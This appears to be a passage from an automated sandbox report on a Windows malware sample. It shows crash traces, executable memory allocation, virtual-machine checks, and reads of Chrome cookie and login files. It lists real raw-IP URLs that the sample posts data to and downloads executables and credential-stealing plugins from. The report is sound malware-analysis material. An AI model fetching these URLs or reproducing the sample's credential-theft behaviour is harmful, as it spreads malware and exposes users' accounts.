GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201856 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201864 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 46371236	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad483bc 0xad481d9 0xad423f5 0xad411b2 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201600 registers.edi: 38201900 registers.eax: 0 registers.ebp: 38201912 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad4877c 0xad481d9 0xad423f5 0xad411b2 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201888 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201896 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 47861880	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad483bc 0xad481d9 0xad4240d 0xad411b2 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201600 registers.edi: 38201900 registers.eax: 0 registers.ebp: 38201912 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad4877c 0xad481d9 0xad4240d 0xad411b2 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201888 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201896 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 43192864	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad483bc 0xad481d9 0xad4240d 0xad411b2 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201600 registers.edi: 38201900 registers.eax: 0 registers.ebp: 38201912 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 0	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://77.91.68.3/home/love/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/foto175.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/new/fotod45.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.124.31/smo/du.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Performs some HTTP requests (6 events)

request	POST http://77.91.68.3/home/love/index.php
request	GET http://77.91.124.31/new/foto175.exe
request	GET http://77.91.124.31/new/fotod45.exe
request	GET http://77.91.124.31/smo/du.exe
request	GET http://77.91.68.3/home/love/Plugins/cred64.dll
request	GET http://77.91.68.3/home/love/Plugins/clip64.dll

Sends data using the HTTP POST Method (1 event)

request

POST http://77.91.68.3/home/love/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 285 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74151000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2744 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73251000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d71000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ef0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c92000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7263b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72651000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72652000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x715aa000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02591000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7326f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70ba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2788 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72d12000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02420000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c42000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x725eb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72601000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72602000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02520000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7155a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 10, 2023, 6:10 p.m.	process_identifier: 2980 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (12 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW July 10, 2023, 6:10 p.m.	number_of_free_clusters: 3252963 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:10 p.m.	number_of_free_clusters: 3252963 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:10 p.m.	number_of_free_clusters: 3252841 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:10 p.m.	number_of_free_clusters: 3252841 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3251701 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3251701 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3251618 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3251618 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3250906 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3250906 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3250784 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 10, 2023, 6:13 p.m.	number_of_free_clusters: 3250784 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
